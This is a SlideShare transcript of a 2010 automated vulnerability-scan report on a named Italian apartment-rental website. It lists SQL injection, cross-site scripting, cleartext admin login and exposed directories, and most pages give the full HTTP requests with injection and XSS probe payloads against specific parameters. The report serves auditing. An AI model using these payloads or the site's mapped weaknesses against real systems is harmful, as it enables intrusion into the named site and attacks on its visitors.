Your SlideShare is downloading. ×
Acunetix Website Audit

                                22 February, 2010




Detailed Scan Report




         Generated ...
Scan of http://www.ischiaappartamenti.com:80/
Scan details

Scan information
Starttime             2/21/2010 1:27:31 PM
Fi...
DNS server running

FTP server running

DNS server running on TCP

Whois lookup




POP3 server running

List of client sc...
Alerts summary

    Blind SQL/XPath injection
Affects                                       Variations
/de/appartamento.ph...
Email address found
Affects                                             Variations
/de                                    ...
Alert details

   Blind SQL/XPath injection

Severity           High
Type               Validation
Reported by module Mult...
/it/appartamento.php
Details


Request
GET /it/appartamento.php?id=2+and+31337-31337=0 HTTP/1.0
Accept: */*
User-Agent: Mo...
Cookie:
__utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126
6780532;__utmc=177195445;...
Connection: Close
Pragma: no-cache
Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanni...
Connection: close
Date: Sat, 20 Feb 2010 19:32:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskW...
/it/appartamento.php
Details


Request
GET /it/appartamento.php?id=>"><ScRiPt%20%0a%0d>alert(403705640160)%3B</ScRiPt> HTT...
GET /it/appartamento.php?id=%00"'><ScRiPt%20%0a%0d>alert(404185646124)%3B</ScRiPt>
HTTP/1.0
Accept: */*
User-Agent: Mozill...
__utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126
6780532;__utmc=177195445;__utmz=1...
Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning ...
Date: Sat, 20 Feb 2010 19:33:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
X-Powered-By: P...
/it/appartamento.php
Details


Request
GET /it/appartamento.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; ...
/it/appartamento.php
Details



Request
GET /it/appartamento.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible;...
/it/appartamento.php
Details


Request
GET /it/appartamento.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; ...
GET /it/appartamento.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1....
__utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126
6780532;__utmc=177195445;__utmz=1...
referer: <script/xss src=http://testphp.acunetix.com/xss.js?403995645206></script>
Pragma: no-cache
Acunetix-Product: WVS/...
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Feb 2010 19:32:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Po...
X-Powered-By: PHP/5.2.3

/it/appartamento.php
Details



Request
GET /it/appartamento.php HTTP/1.0
Accept: */*
User-Agent:...
Recommendation



Affected items
/de/appartamento.php
Details


Request
GET /de/appartamento.php?=>"'><ScRiPt>alert(428475...
/de/appartamento.php
Details


Request
GET /de/appartamento.php?acuparam=>'><ScRiPt>alert(428445928671)</ScRiPt> HTTP/1.0
...
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.ischiaappartamenti.com
Cookie:...
Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning ...
Recommendation




Affected items
/it/appartamento.php
Details


Request
GET /it/appartamento.php HTTP/1.0
Accept: */*
Use...
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
X-Powered-By: PHP/5.2.3

/it/appartamento.php
Details


Request
GET /it/appar...
GET /it/appartamento.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1....
Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning ...
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
X-Powered-By: PHP/5.2.3

/it/appartamento.php
Detai...
/it/appartamento.php
Details


Request
GET /it/appartamento.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; ...
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.ischiaappartamenti.com
Cookie:...
Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning ...
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
X-Powered-By: PHP/5.2.3

/it/appartamento.php
Detai...
/it/appartamento.php
Details


Request
GET /it/appartamento.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; ...
Host: www.ischiaappartamenti.com
Cookie:
__utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=17...
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Feb 2010 19:31:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Po...
/it/appartamento.php
Details


Request
GET /it/appartamento.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; ...
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.ischiaappartamenti.com
Cookie:...
Connection: Close
accept-language: '
Pragma: no-cache
Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORM...
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Feb 2010 19:31:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP...
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
X-Powered-By: PHP/5.2.3

/it/appartamento.php
Details


Request
GET /it/appar...
/it/appartamento.php
Details


Request
GET /it/appartamento.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; ...
GET /it/appartamento.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1....
66780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct
)|utmcmd=(none)
Connection: Close...
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Feb 2010 19:30:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Po...
/it/appartamento.php
Details


Request
GET /it/appartamento.php?id=' HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compati...
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.ischiaappartamenti.com
Cookie:...
Connection: Close
referer: acunetix'"
Pragma: no-cache
Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NOR...
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Feb 2010 19:30:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP...
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
X-Powered-By: PHP/5.2.3

/it/appartamento.php
Details


Request
GET /it/appar...
Request
GET /it/appartamento.php HTTP/1.0
Accept: */*
User-Agent: JyI=
Host: www.ischiaappartamenti.com
Cookie:
__utma=177...
66780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct
)|utmcmd=(none)
Connection: Close...
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Wvs Single Scan
Upcoming SlideShare
Loading in...5
×

Wvs Single Scan

1,534

Published on

a sercurity scan of a website

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,534
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
21
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "Wvs Single Scan"

  1. 1. Acunetix Website Audit 22 February, 2010 Detailed Scan Report Generated by Acunetix WVS Reporter (v6.0 Build 20081124)
  2. 2. Scan of http://www.ischiaappartamenti.com:80/ Scan details Scan information Starttime 2/21/2010 1:27:31 PM Finish time 2/21/2010 6:58:36 PM Scan time 5 hours, 31 minutes Profile all Server information Responsive True Server banner Microsoft-IIS/6.0 Server OS Windows Server technologies ASP.NET,PHP Threat level Alerts distribution Total alerts found 250 High 113 Medium 1 Low 121 Informational 15 Knowledge base List of open TCP ports Acunetix Website Audit 2
  3. 3. DNS server running FTP server running DNS server running on TCP Whois lookup POP3 server running List of client scripts List of files with inputs List of authentication pages List of external hosts Acunetix Website Audit 3
  4. 4. Alerts summary Blind SQL/XPath injection Affects Variations /de/appartamento.php 1 /it/appartamento.php 1 Cross Site Scripting Affects Variations /it/appartamento.php 34 Cross Site Scripting in URI Affects Variations /de/appartamento.php 4 /it/appartamento.php 4 SQL injection Affects Variations /it/appartamento.php 69 Cookie manipulation Affects Variations /it/appartamento.php 1 Application error message Affects Variations /it/appartamento.php 109 Possible sensitive directories Affects Variations /admin 1 /cgi-bin 1 /css 1 /de/include 1 /html 1 /it/include 1 /public 2 /public/immagini/appartamenti/home 1 /test 1 User credentials are sent in clear text Affects Variations /admin/login.php 2 Broken links Affects Variations /a 1 Acunetix Website Audit 4
  5. 5. Email address found Affects Variations /de 1 /de/appartamento.php 3 /de/grazie.php 1 /html 1 /it 1 /it/appartamento.php 3 /it/grazie.php 1 Password type input with autocomplete enabled Affects Variations /admin/login.php 2 Windows Terminal Services server running Affects Variations Server 1 Acunetix Website Audit 5
  6. 6. Alert details Blind SQL/XPath injection Severity High Type Validation Reported by module MultiRequest parameter manipulation Description Impact Recommendation Affected items /de/appartamento.php Details Request GET /de/appartamento.php?id=2+and+31337-31337=0 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 20:09:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html Acunetix Website Audit 6
  7. 7. /it/appartamento.php Details Request GET /it/appartamento.php?id=2+and+31337-31337=0 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 20:04:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html Cross Site Scripting Severity High Type Validation Reported by module Parameter manipulation Description Impact Recommendation Affected items /it/appartamento.php Details Request GET /it/appartamento.php?id=<ScRiPt%20%0a%0d>alert(403685640160)%3B</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Acunetix Website Audit 7
  8. 8. Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=</title><ScRiPt%20%0a%0d>alert(403725640160)%3B</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=email@some<ScRiPt%20%0a%0d>alert(403745640160)%3B</ScRiPt>domain .com HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Acunetix Website Audit 8
  9. 9. Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=>'><ScRiPt%20%0a%0d>alert(403695640160)%3B</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=--><ScRiPt%20%0a%0d>alert(403735640160)%3B</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Acunetix Website Audit 9
  10. 10. Connection: close Date: Sat, 20 Feb 2010 19:32:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 /it/appartamento.php Details Request GET /it/appartamento.php?id=</textarea><ScRiPt%20%0a%0d>alert(403715640160)%3B</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=<script>alert(403675640160)</script> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html Acunetix Website Audit 10
  11. 11. /it/appartamento.php Details Request GET /it/appartamento.php?id=>"><ScRiPt%20%0a%0d>alert(403705640160)%3B</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:32:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=<ScRiPt+src=http://testphp.acunetix.com/xss.js?403985642867></Sc RiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:33:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request Acunetix Website Audit 11
  12. 12. GET /it/appartamento.php?id=%00"'><ScRiPt%20%0a%0d>alert(404185646124)%3B</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:33:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=<script/xss+src=http://testphp.acunetix.com/xss.js?404095646124> </script> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:33:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=<iframe/+/onload=alert(404405653548)></iframe> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: Acunetix Website Audit 12
  13. 13. __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:34:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=%3C/xss/*-*/style=xss:e/**/xpression(alert(404365650606))%3E HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:34:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=<img+src=http://testphp.acunetix.com/dot.gif+onload=alert(404105 646124)> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix Website Audit 13
  14. 14. Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:33:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=<body+onload=alert(403975642867)> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:33:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=%00'"><ScRiPt%20%0a%0d>alert(404175646124)%3B</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Acunetix Website Audit 14
  15. 15. Date: Sat, 20 Feb 2010 19:33:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 /it/appartamento.php Details Request GET /it/appartamento.php?id=</div><ScRiPt%20%0a%0d>alert(404155646124)%3B</ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:33:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* 